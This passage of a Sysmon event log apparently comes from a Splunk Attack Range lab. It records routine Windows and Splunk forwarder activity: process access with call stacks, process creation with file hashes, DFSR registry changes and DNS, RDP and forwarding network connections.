Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-123B-6216-6F04-000000003902}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217164Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.706{4F8D34B0-123B-6216-6F04-000000003902}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217163Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.455{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=028EA05743DE6C1DA75AF6AF1F040AD7,SHA256=B970B29C1C04B39E257B38CDD6D3E88A0472579807F24F0624E4405AF9D5B7FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217162Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-123B-6216-6E04-000000003902}2492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217161Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217160Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217159Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217158Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217157Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217156Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217155Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217154Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-123B-6216-6E04-000000003902}2492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217153Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217152Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217151Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.205{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-123B-6216-6E04-000000003902}2492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217150Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:47.206{4F8D34B0-123B-6216-6E04-000000003902}2492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000217149Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.073{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse47.242.107.32-55508-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 13241300x8000000000000000289271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:53:47.628{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000289270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:53:47.596{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000289269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:53:47.596{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000289268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:47.546{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:47.546{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000289283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:47.111{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57370- 354300x8000000000000000289282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:47.102{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local63855-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000289281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:47.102{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57419- 354300x8000000000000000289280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:47.102{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57419-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000289279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:47.022{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53520-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000289278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:47.022{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53520-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000289277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:46.539{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53519-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:48.714{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C147E254113D5440647E05C98D4AFDFF,SHA256=2601BC2167997DCCD6FE93672B32C1E47F238B640034D1D908A3B49BAC1CB95B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217181Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:48.939{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EEDB28117B97635C14A932CAB8C4053,SHA256=308ACA8483D94C889DFC1D3DB00695473623901F803D68B68697B29DE6526AEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217180Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:48.923{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB0C5B249321DDC022E269CDF8569E62,SHA256=E9285AE36B6F2D234CBDD384407F59D8A838113B2BCF9C0B55941D235BFA8F7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217179Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:48.205{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FC952227E2F5820FD53ADE5A814EF23,SHA256=DE78D2CC5B7D70DD7B1D179589CFD8A96DF039D2A92440EEE696D4D6326284BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217178Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.493{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51376-false10.0.1.12-8089- 10341000x8000000000000000289275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:48.467{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 